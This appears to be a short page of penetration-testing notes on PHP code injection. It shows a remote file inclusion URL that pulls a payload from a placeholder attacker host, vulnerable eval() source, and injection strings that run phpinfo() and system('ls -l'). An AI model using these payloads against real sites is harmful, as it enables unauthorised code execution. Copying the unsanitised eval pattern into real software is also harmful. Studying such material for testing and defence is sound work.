search
Page cover

💰Code Injection (RCE)

Scenario 1: PHP include() function

In this scenario, the PHP include() function is in use with no input validation.

http://vulnerable-site.com/?path=support.php

To exploit the vulnerability, we will be storing our payload in an external server to call the external file and execute on the vulnerable server:

http://vulnerable-site.com/?path=http://attacker-website/paylaod.php

hashtag
----------------------------------------------------------------

hashtag
Scenario 2: PHP eval() function

hashtag
In this example, the vulnerable PHP eval() function is in use which provides a quick and convenient way of executing string values as PHP code, especially in the initial phases of development or for debugging which will cause the code injection. The source code looks like the following:

<?php eval ("echo ".$_REQUEST["parameter"].";"); ?>

The parameter is being passed to the URL as the following:

http://vulnerable-site.com/?parameter=value

An attacker who is aware of eval() function in use (can be revealed via error messages) can send the following payload to exploit the vulnerability:

http://vulnerable-site.com/?parameter=value;phpinfo();

If successful, phpinfo() will be executed after ‘echo’ing the parameter value and will provide information about the configuration details.

Moreover, in case system() function is also enabled, this can allow the attacker to execute arbitrary commands as below:

http://vulnerable-site.com/?parameter=value;system('ls -l');

hashtag
----------------------------------------------------------------

hashtag
RCE (Reverse shell) by Using PHP Data Wrapper in LFI Path: File=

hashtag
-------------------------------------------------------------

PreviousMy RCE / File Upload / Command injection MethodologyNextCode Injection Cheatsheet

Last updated